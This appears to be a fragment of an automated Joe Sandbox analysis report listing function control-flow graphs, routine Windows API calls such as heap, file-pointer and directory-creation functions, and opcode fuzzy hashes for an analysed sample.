                                                        control_flow_graph 1268 4051c8-4051de call 413954 call 405268 1272 4051e3-4051f6 call 40511b 1268->1272 1275 405246-405253 call 4051a4 call 403a9c 1272->1275 1276 4051f8-4051ff call 4051a4 1272->1276 1287 405254 1275->1287 1282 405201-405218 call 4051a4 call 403a9c call 4058cd 1276->1282 1283 405243 1276->1283 1292 40521d-40521f 1282->1292 1283->1275 1289 405256-405263 1287->1289 1293 405221-40522a call 40498d 1292->1293 1294 405239-405241 call 405268 1292->1294 1299 405264-405266 1293->1299 1300 40522c-405237 GetLastError 1293->1300 1294->1272 1299->1289 1300->1287 1300->1294
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004051CD
                                                          • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                                          • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                                                        • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2901101390-0
                                                        • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                                        • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                                                        • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                                        • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                                          • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                                                        • HeapDestroy.KERNEL32 ref: 00415A48
                                                          • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocCreateDestroyVersion
                                                        • String ID:
                                                        • API String ID: 2507506473-0
                                                        • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                                        • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                                                        • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                                        • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                                        • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                                                        • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                                        • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: ecbf576acca07dedac3840329e2192b092c50df8f4c4434df770b83564850c04
                                                        • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                                                        • Opcode Fuzzy Hash: ecbf576acca07dedac3840329e2192b092c50df8f4c4434df770b83564850c04
                                                        • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00402812
                                                          • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                                          • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterH_prologLeave
                                                        • String ID:
                                                        • API String ID: 367238759-0
                                                        • Opcode ID: 32f371ae7e942dd8cbcb8f48f1108dc85583b3cd9349b98e5631585cdaf2140a
                                                        • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                                                        • Opcode Fuzzy Hash: 32f371ae7e942dd8cbcb8f48f1108dc85583b3cd9349b98e5631585cdaf2140a
                                                        • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                                        • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                                                        • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                                        • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040EA10
                                                          • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: affc2a5d75034335f3871f8cb195a0f716e907f53b5571a3d62afe212edf48d8
                                                        • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                                                        • Opcode Fuzzy Hash: affc2a5d75034335f3871f8cb195a0f716e907f53b5571a3d62afe212edf48d8
                                                        • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                                        • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                                                        • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                                        • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 63c8e573d396fc96efa94e1a42408f9b291e1898eda9953334360b92db0a26c8
                                                        • Instruction ID: 9f9062e63dd4364452e2da1ca70528b8602d2a0ea6fe4ab8d483929f8703c9bd
                                                        • Opcode Fuzzy Hash: 63c8e573d396fc96efa94e1a42408f9b291e1898eda9953334360b92db0a26c8
                                                        • Instruction Fuzzy Hash: 69518C31C04145DBCB15DFA8C884EAA7B71AF45308F1880BBE4157F2D2DA399A4EDB5D
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                                        • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                                                        • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                                        • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040D1B0
                                                          • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                                          • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                                        • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                                                        • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                                        • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                                          • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                                          • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                        • String ID:
                                                        • API String ID: 1616793339-0
                                                        • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                                        • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                                                        • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                                        • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                                          • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                                          • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeHeapInitialize
                                                        • String ID:
                                                        • API String ID: 641406236-0
                                                        • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                                        • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                                                        • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                                        • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040A016
                                                          • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                                        • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                                                        • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                                        • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004092EE
                                                          • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                                          • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                                          • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 2062786585-0
                                                        • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                                        • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                                                        • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                                        • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE ref: 004048F1
                                                          • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                                          • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                                          • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$ApisH_prolog
                                                        • String ID:
                                                        • API String ID: 3885834519-0
                                                        • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                                        • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                                                        • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                                        • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                                          • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
